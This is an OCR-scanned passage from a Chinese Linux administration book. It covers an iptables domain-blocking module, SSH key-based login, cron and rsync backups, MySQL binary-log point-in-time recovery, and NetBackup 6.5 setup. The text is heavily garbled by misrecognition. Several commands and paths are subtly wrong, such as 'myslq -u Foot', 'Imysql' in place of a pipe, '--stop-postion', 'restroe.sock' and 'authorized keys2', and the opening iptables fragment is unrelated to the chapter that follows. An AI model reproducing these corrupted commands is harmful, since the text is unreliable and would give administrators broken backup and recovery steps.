一 些 私企 单位 需要 禁止 员工 上 某 些 网 站 ,但 是 单纯 的 字符 串 匹 配 无 法 进行 批量 的 域名 匹 
配 ， 而 且 容 易 出 现 误 匹 配 。 这 里 有 一 个 以 前 写 的 用 来 匹配 域名 的 模块 。 使 用 方法 如 下 : 


#iptables -A FORWARD -m domain --domain ".baidu.com" -j DROP 


上 面 的 规则 会 禁止 掉 所 有 以 baidu.com 结尾 的 域名 查询 。 


#iptables -A FORWARD -m domain --domain "www.sina.com.cn" -j DROP 


上 面 的 规则 会 禁止 掉 www.sina.com.cn 域名 的 查询 。 
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12.1 运用 SSH、Rsync 实现 数据 自动 备份 


网 管 人 员 大 概 都 无 一 例外 地 经 历 过 系统 备份 , 尤其 是 重要 系统 的 备份 、 重 要 数据 库 系统 的 
备份 工作 。 由 于 备份 是 频繁 而 琐碎 的 工作 , 如 何 能 把 这 个 工作 做 得 既 简单 又 灵活 呢 ? 下 面 就 来 
介绍 在 Linux 下 如 何 使 用 SSH、Crontab 以 及 Rsync 工具 来 进行 数据 的 自动 备份 与 同步 。 


12.1.1 SSH 无 密码 安全 登录 


为 什么 要 选择 SSH 呢 ? SSH 又 是 什么 呢 ?可 以 说 它 是 蔡 代 以 前 Telnet 的 远程 登录 工具 ， 
SSH 的 英文 全 称 是 Secure Shell。 用 户 可 以 把 所 有 传输 的 数据 进行 加 密 ， 这 样 即使 网 络 中 的 黑 
客 能 够 动 持 用 户 所 传输 的 数据 ， 如 果 不 能 解密 的 话 ， 也 不 能 对 数据 传输 构成 真正 的 威胁 , 而 且 
SSH 的 数据 传输 是 经 过 压缩 的 ， 可 以 加 快 传输 的 速度 ， 这 就 是 SSH 目前 能 替代 Telnet 远程 登 
录 工 具 的 原因 。 

说 到 安全 ，SSH 提供 两 种 级 别 的 安全 验证 : 一 种 是 基于 口令 的 安全 验证 ， 只 要 用 户 知道 
自己 账号 和 口令 ， 就 可 以 登录 到 远程 主机 ， 所 有 传输 的 数据 都 会 被 加 密 ， 但 是 不 能 保证 用 户 正 
在 连接 的 服务 器 就 是 用 户 想 连接 的 服务 器 , 可 能 会 有 别 的 服务 器 在 冒充 真正 的 服务 器 , 这 存在 
着 潜在 的 威胁 ; 一 种 是 基于 密 钥 的 安全 验证 , 需要 依靠 密 钥 , 也 就 是 用 户 必须 为 自己 创建 一 对 
公 钥 / 密 钥 ， 并 把 公用 密 钥 放 在 需要 访问 的 服务 器 上 ， 如 果 需 要 连接 到 SSH 服务 器 上 ， 客 户 端 
软件 就 会 向 服务 器 发 出 请 求 , 请 求 使 用 用 户 的 密 钥 进 行 安全 验证 ,服务 器 收 到 请 求 之 后 ， 先 在 
服务 器 上 用 户 的 主 目录 下 找到 该 用 户 的 公用 密 钥 ,然后 把 它 和 用 户 发 送 过 来 的 公用 密 钥 进 行 比 
较 。 如 果 两 个 密 钥 一 致 ， 服 务 器 就 用 公用 密 钥 加 密 “ 质 询 ”， 并 把 它 发 送 给 客户 端 软件 ， 客 户 
端 软件 收 到 “质询 ”之 后 就 可 以 用 用 户 的 私人 密 钥 解密 再 把 它 发 送 给 服务 器 。 

下 面 做 的 就 是 利用 第 二 种 基于 密 钥 的 安全 验证 的 登录 ， 有 具体 方法 如 下 。 


使 用 如 下 命令 在 需要 各 份 的 机 器 上 创建 一 对 公 钥 / 密 铀 : 


#ssh-keygen -t rsa 

Generation public/private rsa key pair. 

Enter file in which to save the key(/root/.ssh/id rsa): 
Enter passphrase (empty for no passphrase) : 

Enter same passphrase again: 


Your identiflcation has been save in /root/.ssh/id rsa. 
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Your public key has been saved in /root/.ssh/id ras.pub. 
The key fingerprint is: 
c3:a0:de:f8:24:8e:f6:0d:ed:0a:b0:a2:2d:aa:d3:8b root@localhost.localdomain 


这 期 间 一 直 按 回 车 键 即 可 ， 这 样 公 钥 / 密 钥 就 创建 完毕 。 
贺 使 用 如 下 命令 把 公 钥 传 到 需要 备份 的 服务 器 上 : 


#ssh 192.168.1.2 
#mkdir .ssh;chmod 0700 .ssh 


园 远程 登录 到 需要 备份 的 服务 器 上 并 且 创建 .ssh 目录 : 
#scp .ssh/id-rsa.pub 192.168.1.2 : .ssh/authorized keys2 


上 述 命令 可 以 把 公 钥 远程 传 过 去 。 

这 样 一 个 SSH 基于 密 钥 的 安全 验证 登录 就 简单 完成 了 ， 现 在 就 可 以 从 192.168.1.1 直接 用 
“ssh 192.168.1.2” 无 密码 自动 登录 过 去 了 ， 这 样 就 简单 且 安 全 地 实现 了 自动 登录 ， 可 以 为 下 
而 定时 做 备份 打下 基础 。 


12.1.2 ”crontab 定时 和 数据 同步 


这 里 简单 介绍 一 下 定时 触发 和 同步 ，crontab 是 一 个 能 定时 执行 命令 的 工具 ， 它 可 让 使 用 
者 在 固定 时 间或 固定 间隔 执行 程序 ， 下 面 就 介绍 一 下 这 个 命令 的 常用 参数 。 


@ -e: 执行 文字 编辑 器 来 设 定时 程 表 ， 内 定 的 文字 编辑 器 是 Vi， 如果 你 想 用 别 的 文字 编 
辑 器 ， 则 请 先 设 定 VISUAL 环境 变量 来 指定 使 用 哪个 文字 编辑 器 ( 比如 
setenVVISUALjce )。 

@ -r: 删除 目前 的 时 程 表 。 

@ -I: 列 出 目前 的 时 程 表 。 


crontab 时 程 表示 格式 如 下 : 


fl f2 f3 f4 f5 command 


其 中 ，fl 表示 分 钟 ， 亿 表示 小 时 ，f3 表示 一 个 月 份 中 的 第 几 日 ，f 表示 月 份 ， 在 表示 一 
个 星期 中 的 第 几 天 ,command 表示 要 执行 的 命令 。 当 生 为 <“*” 时 表示 每 分 钟 都 要 执行 command， 
亿 为 “*” 时 表示 每 小 时 都 要 执行 程序 ， 其 余 类 推 。 当 身 为 “a-b” 时 表示 从 第 a 分 钟 到 第 b 
分 钟 内 要 执行 命令 , 亿 为 “a-b” 时 表示 从 第 a 到 第 b 小 时 都 要 执行 命令 。 当 和 为“*/n” 时 表 
示 每 n 分 钟 个 时 间 间 隔 执行 一 次 ， 也 为 “*/n” 表 示 每 n 小 时 个 时 间 间 隔 执行 一 次 ， 其 余 类 推 。 
当 生 为 a、b、c…*… 时 表示 第 a、b、c…… 分 钟 要 执行 ,人 2 为 a、b、c…… 时 表示 第 a、b、c…… 
个 小 时 要 执行 ， 其 余 类 推 。 当 然 也 可 以 将 要 定时 执行 的 命令 存放 在 预备 文档 里 ， 这 里 就 要 用 
crontab file 的 方式 来 设 定时 程 表 。 


Linux ”企业 应 用 案例 精 解 


12.1.3 ”Rsync 数据 同步 
而 介绍 一 个 数据 同步 工具 Rsync。Rsync 的 主要 参数 说 明 如 下 : 


| 


-V，--verbose 输出 的 信息 ; 

-q，--quiet 安静 模式 ， 几 乎 没有 信息 产生 ， 常 用 在 以 cron 执行 rsync; 
-a，--archive archive mode 权限 保存 模式 ， 相 当 于 -rlptgoD 参数 ; 
-p，--perms 保留 档案 权限 ; 

-O，--owner 保留 档案 所 有 者 (root only ); 

，--group 保留 档案 群 ; 

-D，--devices 保留 device 信息 (root only ); 

-e，--h=COMMAND 定义 所 使 用 的 remote shell; 

-4，--ipv4 使 用 IPv4 协议 ; 

-6，--ipv6 使 用 IPv6 协议 。 


eeeeeee eg@ @ 
1 
ga 


下 面 看 一 下 SSH 和 Rsync 工具 组 合 使 用 的 方法 : 


#rsync -ave ssh 192.168.1.2:/home/ftp/pub/ /home/ftp/pub/ 


需要 注意 的 是 源 端 目录 名 称 末 尾 的 “/”。 在 源 说 明 中 后 级 “/” 通 知 Rsyne 复制 该 目录 的 
内 容 ， 但 不 复制 目录 文件 自身 。 要 想 把 目录 包含 在 要 复制 内 容 的 最 顶层 就 要 去 掉 “/”。 
使 用 SSH 传输 Rsyne 流量 的 优点 是 ， 可 通过 网 络 加 密 数 据 ， 而 且 速 度 非常 快 。 如 果 要 在 
台 计 算 机 之 间 保 持 大 型 、 复 杂 目 录 结 构 的 同步 性 (尤其 是 两 者 间 的 差异 很 小 时 ), 那么 Rsyne 
就 是 一 种 使 用 起 来 极为 方便 〈 并 且 执行 速度 很 快 ) 的 工具 。 比 如 如 下 命令 : 


#crontab -e 
0 17 * * 1-5 rsync -ave ssh 192.168.1.2:/my /my 


上 面 的 “crontab-e” 命 令 的 含义 是 编辑 定时 启动 脚本 ， 然 后 在 周一 到 周 五 的 每 天 下 午 5 点 
执行 SSH 远程 自动 登录 ， 把 192.168.1.2 的 /my 目录 下 的 所 有 东西 同步 到 本 地 的 /my 目录 下 ， 
这 样 就 实现 了 自动 数据 同步 备份 的 目的 了 。 


12.2 用 日 志 进 行 MySQL 数据 库 实 时 恢复 


在 对 MySQL 数据 和 表格 结构 进行 备份 时 ，mysqldump 是 一 个 非常 有 用 的 工具 。 然而, 通 
常情 况 下 , 一 般 一 天 一 备份 ， 如 果 在 刚 备份 完成 的 一 段 时 间 内 数据 出 现 丢 失 ， 那么 这 些 数据 将 
可 能 无 法 恢复 。 有 什么 方法 可 以 及 时 地 对 数据 进行 保护 呢 ? 事实 上 , 现在 有 几 种 方法 都 可 以 实 
现 此 目的 。 这 里 介绍 其 中 一 种 ， 即 使 用 二 进 制 日 志 进 行 数 据 恢 复 。 

在 一 个 服务 器 中 ， 当 SQL 事务 执行 时 ， 一 个 二 进 制 日 志 可 以 记录 所 有 SQL 事务 。 考 虑 到 
服务 器 的 性 能 ， 有 些 系统 管理 员 会 把 所 有 日 志 都 最 小 化 。 事 实 上 ,平均 来 说 二 进 制 日 志 对 服务 
器 性 能 的 影响 只 有 1%， 作 为 回报 ， 这 种 性 能 的 牺牲 可 以 换 来 实时 的 数据 恢复 功能 。 
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12.2.1 设置 二 进 制 日 志 


二 进 制 日 志 记 录 一 台 服 务 器 上 所 有 SQL 执行 事务 。 通 过 使 用 mysqlbinlog 工具 ,二进制 日 
志文 件 中 的 内 容 可 以 被 轻松 地 提取 出 来 ， 其 中 的 SQL 语句 也 可 以 被 轻松 地 重新 执行 。 要 将 二 
进 制 日 志 功 能 设 为 可 用 , 可 以 在 服务 器 选项 文件 (可 能 是 /etc/my.cnf, 取决 于 用 户 所 用 的 系统 ) 
的 [mysqld] 组 中 加 入 以 下 一 行 配置 : 


log-bin=/var/log/mysql/bing.1og 


注意 : 这 里 使 用 的 确切 路 径 取 决 于 文件 系统 和 用 户 参数 。 一 般 情 况 下 , 还 需要 创建 相应 的 
目录 用 于 存放 日 志 , 并 且 根据 所 使 用 的 文件 系统 对 目录 的 所 有 权 和 许可 情况 进行 更 改 。 基 于 安 
全 性 的 考虑 ， 建 议 将 备份 数据 的 日 志文 件 存放 在 一 个 单独 的 硬盘 驱动 器 中 。 上 述 文件 的 后 组 
log 将 被 6 个 数字 自动 蔡 代 。 用 户 可 以 对 日 志 进 行 限制 , 使 其 只 对 某 个 特定 的 数据 库 进 行 记录 ， 
或 者 在 日 志 中 忽略 某 些 特定 的 数据 库 。 有 关 日 志文 件 的 细 化 调整 信息 ， 可 以 查看 相关 文档 
http://dev.mysql.com/doc/mysql/en/binary-log.html。 在 上 述 选 项 文件 中 创建 相应 的 记录 以 后 , 一 
般 需 要 重新 启动 MySQL 服务 器 以 使 其 生效 。 


除 使 用 mysqldump 等 工具 进行 常规 备份 之 外 , 一 般 还 需要 将 二 进 制 日 志和 备份 进行 同步 。 
在 进行 备份 时 ， 可 以 通过 flush 日 志 来 实现 这 一 功能 ， 可 以 将 类 似 下 面 的 语句 加 入 cron 或 类 似 
的 程序 调度 工具 中 : 


mysqladmin -u root -pmypwd flush-logs 


在 上 面 的 语句 中 ，mysqladmin 工具 是 用 于 flush 服务 日 志 的 。 用 户 也 可 以 通过 在 MySQL 
客户 端 中 执行 “flush-logs ”语句 来 实现 相同 的 功能 。 


12.2.2 简单 的 数据 恢复 


虽然 有 时 略 显 单调 乏味 , 但 每 天 备份 和 运行 二 进 制 日 志 的 确 是 一 个 在 MySQL 服务 器 中 恢 
复数 据 的 不 错 方法 。 比 如 ， 可 以 每 天 在 深夜 使 用 mysqldump 对 数据 进行 备份 ， 如 果 某 天 在 数 
据 备份 完成 后 的 一 段 时 间 里 ， 由 于 某 种 原因 数据 丢失 ， 可 以 使 用 以 下 方法 来 对 其 进行 恢复 。 

首先 ， 停 止 MySQL 服务 器 ， 然 后 使 用 以 下 命令 重新 启动 MySQL 服务 器 。 该 命令 将 保证 
你 是 唯一 可 以 访问 该 数据 库 服务 器 的 人 : 


#mysqld --socket=/tmp/mysql restore.sock --skip-networking 


这 里 ，--socket 选项 将 为 UNIX 系统 命名 一 个 不 同 的 Socket 文件 。Windows 系统 中 则 需要 
提供 一 个 管道 名 称 ， 比 如 MySQL restore, 而 不 是 路 径 和 文件 名 。 可 以 使 用 以 下 命令 : 


#mysqld-nt --enable-named-pipe --socket=MySQL restore--skip-networking 


但 在 非 Windows NT 的 Windows 系统 中 ， 因 为 无 法 命名 管道 ， 所 以 需要 使 用 TCP/IP。 这 
种 情况 下 ， 可 以 使 用 --port 选项 对 非 3306 端口 进行 监听 。 用 户 可 以 选择 使 用 任何 没有 被 其 他 
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任务 所 使 用 的 非特 权 端 口 。 这 里 , --skip-networking 选项 的 目的 是 阻止 用 户 通过 TCP/IP、Socket 
文件 或 管道 来 访问 服务 器 ， 即 本 服务 器 只 能 从 本 地 进行 连接 。 一 旦 服务 器 处 于 独占 控制 之 下 ， 
就 可 以 放心 地 对 数据 库 进 行 操作 ,而 不 用 担心 在 进行 数据 恢复 的 过 程 中 有 用 户 尝试 访问 数据 库 
而 导致 更 多 的 麻烦 。 进 行 恢复 的 第 一 个 步骤 是 恢复 晚上 备份 好 的 dump 文件 : 

#myslq -u Foot -p mypwd --socket=/tmp/mysql restore.sock < /var/backup/ 
20100122.sql 

该 命令 可 以 将 数据 库 的 内 容 恢复 至 晚上 刚刚 完成 备份 的 内 容 。 要 恢复 dump 文件 创建 后 的 
数据 库 事 务 处 理 , 可 以 使 用 mysqlbinlog 工具 。 如 果 每 天 晚上 进行 备份 操作 时 都 对 日 志 进 行 flush 
操作 ， 则 可 以 使 用 以 下 命令 行 工 具 将 恢复 整个 二 进 制 日 志文 件 : 


#mysqlbinlog /var/log/mysql/bin.123456 |mysql -u rot -pmypwd --socket=/tmp/ 


mysql_ restore.sock 


上 述 操 作 完 成 后 ， 以 没有 临时 Socket 文件 和 网 络 限制 的 方法 重新 启动 MySQL 服务 器 。 
经 过 以 上 步骤 之 后 ， 数 据 将 恢复 到 前 一 步 备 份 的 状态 ， 并 且 此 后 执行 的 所 有 SQL 语句 也 
将 被 恢复 。 要 获知 最 新 二 进 制 日 志 的 名 字 ， 可 以 查看 包含 在 日 志文 件 目录 中 的 文件 列表 。 


12.2.3 ”手动 恢复 数据 


在 上 述 情形 中 ， 假 设 需要 恢复 所 有 的 服务 器 数据 ， 而 且 进 行 恢复 操作 的 原因 是 由 于 执行 
SQL 语句 误 删 有 用 数据 ， 那 么 简单 地 使 用 二 进 制 日 志文 件 进行 完全 恢复 将 只 会 重复 所 犯 的 错 
误 。 对 于 这 种 情况 ， 一 种 比较 好 的 解决 办 法 是 运行 上 述 mysqlbinlog， 不 过 不 要 把 结果 直接 导 
入 MySQL， 而 是 将 其 导入 文本 文件 之 中 。 这 样 ， 在 将 该 文件 导入 MySQL 之 前 可 以 对 其 进行 
编辑 。 重 定向 mysqlbinlog 的 输出 可 以 使 用 以 下 命令 : 


#mysqlbinlog /var/log/mysql/bin.123456 >/tmp/mysql _ restore.sql 


该 命令 将 会 在 /tmp 目录 中 生成 一 个 简单 的 文本 文件 。 需要 注意 的 是 , 不 要 使 用 Word 等 文 
字 处 理 器 对 该 文件 进行 编辑 , 因为 文字 处 理 器 会 在 文件 中 添加 一 些 二 进 制 格式 码 , 这 些 格式 码 
在 导入 MySQL 中 时 可 能 导致 一 些 问题 。 在 删除 不 需要 的 SQL 语句 并 且 保存 好 恢复 文件 后 ， 
就 可 以 在 MySQL 客户 端 中 使 用 以 下 命令 进行 恢复 操作 : 


#mysql -u root -pmypwd --socket=/tmp/mysql restore.sock </tmp/mysql- 


restroe.sql 


12.2.4 ”针对 某 一 时 间 点 恢复 数据 


在 MySQL 5.1 版 本 中 ，mysqlbinlog 被 添加 进 一 些 附加 选项 ， 使 得 从 二 进 制 日 志文 件 进行 
恢复 的 过 程 更 加 简单 ， 并 且 不 需要 再 进行 手工 更 改 ， 其 中 就 有 --start-date 和 --stop-date 选项 。 
假设 用 户 在 2010 年 1 月 20 日 上 午 10 点 执行 的 SQL 语句 删除 了 一 个 大 的 数据 表 , 则 可 以 使 用 
以 下 命令 进行 恢复 : 
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#mysqlbinlog --stop-date="2010-01-20 9:59:59" /var/log/mysql/bin.123456 
Imysql -u root -pmypwd --socket=/tmp/mysql restore.sock 


该 语句 将 恢复 所 有 给 定 --stop-date 日 期 之 前 的 数据 。 如 果 在 执行 某 SQL 语句 数 小 时 之 后 才 
发 现 执 行 了 错误 操作 ， 那 么 可 能 还 需要 恢复 之 后 输入 的 一 些 数据 。 这 时 ， 也 可 以 通过 
mysqlbinlog 来 完成 该 功能 : 

#mysqlbinlog --start-date="2010-01-20 10:01:00" /var/log/mysql/bin.123456 
Imysql -u root -pmypwd --socket=/tmp/mysql restore.sock 


该 命令 中 ，SQL 语句 记录 的 10:01:00 以 后 的 内 容 将 会 被 恢复 。 这 样 ， 与 前 面 提 到 的 dump 
文件 恢复 ， 以 及 两 个 mysqlbinlog 命令 相 结合 ， 就 可 以 恢复 上 午 10 点 以 前 和 10:01:00 以 后 的 所 
有 操作 和 数据 。 当 然 ， 还 需要 检查 日 志 以 保证 使 用 的 是 准确 的 时 间 。 


12.2.5 “使 用 position 参数 恢复 


除了 使 用 特定 时 间 恢 复 以 外 ， 还 可 以 使 用 --start-position 和 -stop-position 两 个 mysqlbinlog 
选项 。 这 两 个 选项 的 功能 和 --start-date 与 --stop-date 类 似 ， 不 过 它 要 求 给 出 的 是 可 以 在 日 志 中 
找到 标识 位 置 的 数字 。 

相 比 而 言 ， 使 用 位 置 的 方法 是 一 种 更 精确 的 恢复 方法 。 为 了 决定 位 置 的 数字 ， 可 以 使 用 
--start-date 与 --stop-date 就 错误 事务 处 理 执行 的 某 一 特定 时 间 段 来 运行 mysqlbinlog， 并 且 将 结 
果 重 定向 到 一 个 文本 文件 中 进行 检查 。 命 令 行 的 形式 如 下 所 示 : 


#mysqlbinlog --start-date="2010-01-20 9:55:00" --stop-date="2010-01-22 
10:04:00" /var/log/mysql/bin.123456 >/tmp/mysql restore.sql 


该 命令 会 在 /tmp 目录 下 创建 一 个 小 的 文本 文件 ， 该 文件 中 会 有 执行 错误 SQL 时 间 段 里 的 
所 有 SQL 语句 。 使 用 文本 编辑 器 打开 该 文件 ， 然 后 找到 那个 不 想 再 执行 的 SQL 语句 。 一 旦 知 
道 需要 中 止 和 重新 开始 恢复 过 程 的 位 置 ， 便 记 下 位 置 数 字 。 位 置 的 标识 是 log_pos 后 跟随 的 一 
个 数字 。 恢 复 备 份 文 件 可 以 执行 类 似 以 下 的 命令 行 : 


#mysqlbinlog --stop-postion="368312" /var/log/mysql/bin.123456 |mysql -u root 
-pmypwd --socket=/tmp/mysql restroe.sock 

#mysqlbinlog --start-position="368315" /var/log/mysql/bin.123456 |mysql -u 
root -pmypwd --socket=/tmp/mysql restore.sock 


一 个 命令 会 恢复 停止 位 置 前 的 所 有 事务 ,第 二 个 命令 会 恢复 从 开始 位 置 处 到 二 进 制 日 志 
结束 的 所 有 内 容 。 

对 于 一 个 标准 安装 的 MySQL， 通 过 二 进 制 日 志 完 全 恢复 任何 时 刻 丢 失 的 数据 是 一 
件 非常 简单 、 快 捷 的 事情 。 当 然 ， 如 果 无 法 忍受 使 用 该 方法 的 要 求 ， 比 如 在 进行 恢复 操 
作 时 需要 锁 住 其 他 用 户 等 ， 也 可 以 使 用 其 他 方法 来 保护 数据 ， 比 如 使 用 Replication 
(http://dev.mysql.com/doc/mysql/en/replication.html) 。 
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12.3 NetBackup 的 安装 、 配 置 及 管理 


NetBackup 是 一 款 功能 强大 的 企业 级 数据 备份 管理 软件 ， 目 前 全 球 2000 多 家 大 型 企 
业已 经 选择 了 NetBackup 作为 其 数据 中 心 的 备份 管理 解决 方案 ， 在 SAN 和 NAS 环境 下 
广泛 使 用 。 国 内 的 很 多 大 企业 也 选择 NetBackup 作为 其 备份 解决 方案 。 本 节 主 要 针对 目 
前 广泛 使 用 的 NetBackup 6.5 在 SAN 环境 下 的 使 用 情况 ， 从 宏观 上 提出 如 何 采取 各 种 优 
化 措施 ， 高 效 迅速 地 完成 备份 的 方法 ， 从 而 充分 利用 企业 的 现 有 设备 ， 节 约 成 本 ， 最 大 
限度 地 保护 企业 的 投资 。 


12.3.1 ” NetBackup 的 基本 概念 


NetBackup 是 一 款 采用 全 图 形 的 管理 方式 ,同时 提供 命令 行 接口 并 具有 C/S 架构 的 备份 管 
理 软件 。 管理 员 通 过 它 可 以 设置 自动 备份 策略 ,对 数据 进行 完全 或 增 量 备份 ， 也 可 以 手动 备份 
客户 端 数据 。 

NetBackup 的 Server 端 分 为 MasterServer 和 MediaServer。 MasterServer 的 主要 功能 是 管理 
和 制定 全 网 的 备份 策略 、 控 制 所 有 的 备份 作业 、 管 理 存 储 设备 、 控 制备 份 /归档 和 恢复 操作 ， 
是 集中 管理 的 核心 。MediaServer 只 连接 存储 设备 ， 提 供 数据 分 流 ， 并 不 控制 备份 /归档 策略 和 
恢复 操作 ， 它 的 作用 是 分 散 网 络 负担 ， 来 提高 备份 效率 。 

NetBackup SAN 备份 环境 一 般 由 一 台 Master 服务 器 、 多 台 Media 服务 器 和 Client 服务 器 
组 成 。 典 型 的 备份 环境 架构 如 图 12.1 所 示 。 


磁带 库 SAN 存 储 


Media 服 务 器 
负责 对 磁带 的 
La ] 光纤 交 换 及 < 和 


MediaServerl Media Server 


Media 服 务 器 
5U 负责 对 碰 带 资源 
和 作业 整体 操作 


人 金 业 LAN 或 备份 YLAN 


Client 1 Client 2 ClientN 


图 12.1 典型 的 备份 环境 架构 


备份 时 ,客户 机 产生 备份 数据 流 ， 并 通过 网 络 传送 给 NetBackup Server, NetBackup Server 
根据 配置 将 数据 写 到 相应 的 存储 设备 上 。 归 档 操 作 与 备份 操作 类 似 ， 所 不 同 的 是 ,归档 操作 在 
成 功 把 数据 写 到 存储 设备 上 后 ,会 将 数据 从 原 存储 位 置 上 删除 掉 。 恢 复 时 ， 客 户 端 用 户 可 以 列 
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出 并 选 定 他 们 要 恢复 的 目录 或 文件 。NetBackup Server 从 存储 设备 中 读 取 数 据 之 后 , 将 它们 写 
可 客户 机 。 


12.3.2 安装 NetBackup 


因为 NetBackup 中 的 一 些 功 能 依赖 于 Infrastructure Core Services (ICS) 的 新 产品 ， 即 
VERITAS Private Branch Exchange (PBX) ， 我 们 必须 在 安装 NetBackup 前 先 安装 好 ICS。 进 
入 安装 盘 的 ICS， 依 次 安装 VRTSicsco、VRTSsmf、VRTSpbx、VRTSatClient、VRTSatServer。 
主机 名 约定 为 veritas.ora， 了 JP 为 1.1.1.8。 
可 以 参考 /etc/hosts 格式 : 


127.0.0.1 localhost.localdomain localhost 


hE veritas.org veritas 


注意 : 不 能 忽略 回环 地 址 解析 ， 确 保 /etc/hosts 文件 的 第 一 行 是 “127.0.0.1”， 如 果 配 置 集 
群 则 建议 先 关闭 防火 墙 。 


确保 xinetd 处 于 启用 状态 (service xinetd status) ， 检 查 名 字 解 析 /etclhosts， 和 否则 在 以 后 的 
配置 中 会 出 现 解析 错误 的 情况 。 

进入 安装 目录 并 运行 Jinstall， 随 后 系统 会 向 /usropenv 目录 里 复制 文件 。 这 时 准备 好 安装 
序列 号 ， 并 根据 软件 提示 进行 安装 。 

启动 NetBackup 管理 控制 台 (/usr/openv/NetBackup/bin/jnbSA &) ， 出 现 登 录 对 话 框 ， 如 
图 12.2 所 示 。 


[a Backup Archive Sand Restore 


[VERITAS NetBackup" 


年 You may backup, restore or archive your files 
on a specified NetBackup host To login, enter 
Your username and password. 
Host name: 
vertas ora - 
User name: 
root - 
Passwort 
ere Dam 


辕 Reading java Configuration 


图 12.2 ” NetBackup 登录 对 话 框 
输入 root 用 户 及 口令 。 登 录 成 功 后 界面 如 图 12.3 所 示 。 
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口 veritas.ora (6.0 

p 
File E30 View ns Help 
目 |* * 外 贺 目 了 站 
Veritas.0ra Master ServenD 


‘Veritas.ora (Master Serven Getting Started 
Backup, A and Restore Get step-by-step help serting up NetBackup from start to 
Artivity Monitor finish, 
NetBac et Management 
© ja Rapons Configure Storage Devices 
orage Unts ee 
Catalog 
Host Propentes Configure Volumes 


时 er dia and Device Management 
刀 Device Monitor 
他 加 media 
@ 改 oevces 
乓 Aceess Management 
Vault Management 
月 Filesystem Analyzer 
© 1 Bare Metal Restore Management 


Inventory robots and define volumes for use in standalone 
drives. 


Configure the Catalog B: 
Specify how and when NetBackup Simon and 
catalog information is to be backed up. 


Create a Backup Policy 
Define schedules for backing up data on a single cllent or 
a set of clients. 


Create a Snapshot Backup Policy 
RS Dae schedules for using snapshots to back up client 


Recover the catalogs 
Restore the catalog in a disaster recovery situation from a 
hot catalog backup. 


图 12.3 NetBackup 登录 成 功 界面 
因为 在 服务 器 端 MasterServer 安装 的 时 候 , 同时 也 会 将 Client 安装 到 本 机 ， 直 接 就 可 以 备 


份 本 机 上 的 文件 ， 如果 需要 在 另 一 台 计 算 机 上 安装 客户 端 备份 ,还 需 重新 安装 客户 端 , 但 注意 
双方 的 /etc/hosts 都 要 能 互相 解析 出 对 方 的 机 器 名 。 


12.3.3 ”NetBackup 的 配置 


1. 配置 存储 单元 ( Storage Unit ) 


Storage Unit (存储 单元 ) 是 一 个 逻辑 上 的 概念 。 它 表示 存储 设备 中 管理 一 组 介质 的 单元 ， 
对 于 磁带 库 设 备 来 说 , 一 个 机 械 手 就 可 以 掌管 属于 它 的 所 有 磁带 , 那么 一 个 机 械 手 就 是 一 个 存 
储 单元 。 在 进行 备份 或 归档 操作 时 ，NetBackup 将 数据 通过 存储 单元 写 到 物理 介质 上 ， 
NetBackup 支持 三 种 类 型 的 存储 单元 ， 即 介质 管理 器 、 磁 盘 和 NDMP。 


(1) 存储 单元 的 配置 要 求 

无 论 驱动 器 是 否 受 机 械 手 控制 ， 存 储 单元 都 存在 于 与 驱动 器 连接 的 服务 器 上 。 

对 于 每 一 个 服务 器 , 为 每 一 个 机 械 手 都 添加 一 个 独立 的 存储 单元 : 如 果 一 个 机 械 手 控制 同 
种 密度 的 驱动 器 ,不管 有 多 少 个 驱动 器 ,都 配置 一 个 存储 单元 ; 如 果 一 个 机 械 手 控制 不 同 密度 
的 驱动 器 ,为 每 种 密度 配置 一 个 存储 单元 ; 如 果 驱 动 器 和 机 械 手 连接 于 不 同 的 服务 器 上 , 在 驱 
动 器 连接 的 服务 器 上 配置 存储 单元 指定 相同 的 机 械 手 号 ; 如 果 没有 机 械 手 ， 在 一 个 服务 器 上 
为 同 种 类 型 的 磁带 机 配置 一 个 存储 单元 ，NetBackup 会 自己 选择 磁带 机 。 
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(2) 增加 存储 单元 的 准备 工作 
对 于 没有 机 械 手 的 驱动 器 ， 先 统计 出 有 多 少 不 受 机 械 手 控制 的 驱动 器 的 数量 ; 
对 于 受 机 械 手 控制 的 磁带 机 ， 先 统计 出 以 下 项 目 : 


@ 机 械 手 类 型 。 
@ 控制 机 械 手 的 主机 。 


(3) 配置 一 个 介质 管理 的 存储 单元 

从 NetBackup Administration Console 中 选中 Storage Units， 然 后 从 菜单 Actions 中 选择 增 
加 存储 单元 ; 密度 。 

在 对 话 框 中 输入 存储 单元 名 称 、 服 务 器 名 称 、 机 械 手 类 型 、 机 械 手 号 、 驱 动 器 密度 和 驱动 
器 数目 等 。 


2. 配置 Multiplexing ( MPX ) 多 路 共享 


Multiplexing 可 以 将 不 同 Client 的 备份 写 到 同一 个 存储 设备 上 ， 它 提供 并 行 数据 流 ， 并 且 
能 减少 介质 的 准备 时 间 ， 从 而 充分 发 挥 了 存储 设备 的 传输 能 力 。 
Multiplexing 需要 在 以 下 两 个 地 方 进行 配置 : 


@ Storage Unit。 在 Storage Unit 中 配置 Maximum Multiplexing per Drive， 它 定义 了 在 这 
个 Storage Unit 中 可 以 有 多 少 个 备份 同时 写 到 一 个 驱动 器 上 ， 范 围 是 1~32， 该 值 大 小 
取决 于 CPU 处 理 并 行 任务 的 能 力 。 一 个 Storage Unit 上 可 以 运行 的 最 大 任务 数目 等 于 
一 个 驱动 器 上 的 最 大 任务 数 X Storage Unit 中 的 驱动 器 数目 。 

@ Schedule。 不 管 Schedule 中 的 Multiplexing 是 多 少 ，NetBackup 同时 启动 的 任务 数目 
不 会 超过 Storage Unit 允许 的 数目 。Schedule 的 Multiplexing 数目 也 是 从 1~32。 当 
Schedule Multiplexing 的 数目 达到 每 个 驱动 器 允许 的 Multiplexing 数目 时 ，NetBackup 
开始 使 用 另 一 个 驱动 器 .NetBackup 可 以 将 不 同 Schedule 产生 的 任务 送 到 一 个 驱动 器 。 


3. 配置 数据 备份 的 带宽 


NetBackup 可 以 让 你 限制 数据 备份 的 带宽 ， 从 而 在 不 影响 应 用 运行 的 情况 下 进行 数据 备 
份 。 该 功能 仅 限制 备份 带宽 ， 并 不 影响 恢复 带宽 。 它 也 不 影响 Server 的 备份 。 当 备份 启动 时 ， 
NetBackup 根据 设 定 将 数值 传 给 Client，Client 会 根据 该 值 控制 传送 给 Server 的 速度 ， 如 果 在 
一 个 子 网 上 同时 进行 的 备份 工作 增加 或 减少 ，NetBackup 会 动态 提高 或 降低 数据 的 传输 速度 。 

配置 数据 备份 带宽 的 方法 是 在 /usr/openv/NetBackup/bp.conf 中 加 入 下 面 一 行 : 


LIMIT BANDWIDTH=192.168.12.1 192.168.12.10 


